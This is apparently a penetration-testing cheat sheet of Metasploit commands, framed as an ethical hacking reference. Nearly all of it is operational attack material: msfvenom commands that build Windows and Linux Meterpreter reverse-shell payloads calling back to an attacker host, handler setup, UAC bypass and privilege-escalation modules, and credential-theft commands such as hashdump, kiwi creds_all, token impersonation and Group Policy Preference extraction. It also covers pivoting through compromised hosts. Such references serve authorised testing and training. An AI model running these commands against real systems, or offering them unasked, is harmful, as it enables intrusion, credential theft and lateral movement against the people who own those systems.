Metasploit

The Metasploit Framework is an open-source penetration testing and ethical hacking tool developed by Rapid7. It provides a number of tools to exploit vulnerabilities in computer systems, networks, and applications.

Below are some useful Metasploit commands.

MSFVenom Commands

MSFVenom can be used to generate payloads which are compatible with Metasploit.

TaskHowNotes
List MSFVenom payloadsmsfvenom –list payloadsShows supported payloads. Stageless payloads are designated with an underscore i.e windows/shell_reverse_tcp
Generate a Windows payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f exe > shell-win-x64.exeMaking sure the payload matches the target architecture is preferred. If a 32 bit payload is executed on a 64-bit host, you will need to migrate to a x64 process before extracting hashes.
Generate a Linux Payloadmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f elf > shell-lin-x64

Session Management

The following command can be used to manage sessions.

TaskHowNotes
Start a handleruse exploit/multi/handler
set LHOST 172.23.168.66
set LPORT 6666
set ExitOnSession FALSE
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit -jz
LHOST can be set as an interface ID, such as eth0. ExitOnSession FALSE ensures the listener stays active after an initial shell.
exploit -jz runs the listener as a background task.
Process Migrationpost/windows/manage/migrateUseful for stability, and to migrate from 32 to 64 bit processes.
Session managementsessions -i
sessions -b
sessions -u
-i interacts with a sessions
-b places a session in the background
-u upgrades a standard reverse shell to a Meterpreter shell
Channel managementchannel -i
channel -l
-i interacts with a channel
-l lists available channels
Jobsjobs -l
jobs -k
Jobs are background tasks. They can be viewed with jobs -l, and killed with jobs -k

Privilege Escalation

Some useful modules for common privilege escalation tasks. The following article provides more information on using these modules;

https://www.bordergate.co.uk/windows-privilege-escalation/

TaskHowNotes
Enumerate privileges getprivsWill show the currently active user privileges.
Exploit weak service permissionsuse exploit/windows/local/service_permissions
Exploited unquoted service pathsexploit/windows/local/unquoted_service_path
Search for vulnerabilities that may lead to privilege escalationpost/multi/recon/local_exploit_suggester
Enumerate installed applicationspost/windows/gather/enum_applications
Exploit systems that have AlwaysInstallElevated setexploit/windows/local/always_install_elevated
Bypass UACexploit/windows/local/bypassuac
Enumerate local AV Exclusionspost/windows/gather/enum_av_excluded

Credentials

Commands for extracting credentials. There are a lot of additional application specific modules under post/windows/gather/credentials/.

TaskHowNotes
Dump SAM databaseAs an administrative user:
getsystem
hashdump
Hashes can be cracked, or used for pass the hash attacks.
Extract other credentialsload kiwi
creds_all
May include plaintext credentials on older versions of Windows.
User Impersonationload incognito
list_tokens -u
impersonate bordergate.local\Administrator
getuid
Use rev2self to revert to previous user context.
Extract Unattend.xml credentialsuse post/windows/gather/enum_unattend
Search for credentialssearch -f *.ppkExample looks for putty key files.
Group Policy Preference file extractionpost/windows/gather/credentials/gppFor a domain connected system.

Pivoting

The following commands are useful at identifying other hosts and networks that can be attacked.

TaskHowGuidance
Add routesrun autoroute -s 192.168.19.0/24Use “run autoroute -p” to view active routes.
Configure a SOCKS proxyuse auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9050
run
This should match the values you have configured in /etc/proxychains4.conf.
To use the proxy: proxychains -q nmap -Pn -n -F -sT 192.168.1.1
Port forward to destinationmeterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1Forwards port 8080 on Kali system to port 80 on 192.168.1.1.
Ping sweepuse multi/gather/ping_sweep
set RHOSTS 192.168.1.0/24
set SESSION 1
run
A quick way of mapping new subnets.
ARP Scanrun post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24ARP Scan local subnet.
Review Network Configurationipconfig
netstat
Looking for active connections which may indicate trust relationships between hosts. Review previously unidentified subnets.
Portscan (via Pivot)use auxiliary/scanner/portscan/tcpMake sure routes are added with autoroute before hand.
Reverse DNS Lookupmulti/gather/dns_reverse_lookupUseful for finding new routed targets.

Metasploit Database

The database can be used to store scan results, credentials and loot.

TaskHowGuidance
Initialise the databasesystemctl start postgresql
sudo msfdb init
msf6 > db_status
Required to start using Metasploit database functionality
Configure a workspaceAdd a new workspace: workspace -a myworkspace List workspaces: workspace Change workspaces: workspaceWorkspaces provide separation between data in separate tests
Nmap scanningdb_nmap -sV -AScan using standard Nmap arguments and store the results in the postgres database.
List database contentshosts
services
For listed hosts and service respectively.
Export database contentsservices -o /tmp/services.txt hosts -o /tmp/hosts.txtExport hosts or services to a text file.
Set RHOSTSservices -p 445 -RThe example command will set RHOSTS for any systems with port 445 open. This is very useful when combined with RC scripts.

Scripting

TaskHowGuidance
Save commandsmakerc /tmp/commands.rcSaves executed commands to a file.
Execute saved commandsmsfconsole -r /tmp/commands.rcRuns save commands.

Search Commands

Without filtering, searching for generic terms often results in way too many results. Using search filters reduces the amount of output returned.

TaskHowGuidance
Search for exploits onlysearch type:exploit name:tomcatType could be exploit,post,auxiliary
Search by platformsearch platform:windows name:gather
Remove unwanted resultsgrep -v DoS grep -v local   search type:exploit name:tomcatThe grep needs to be placed before the search command.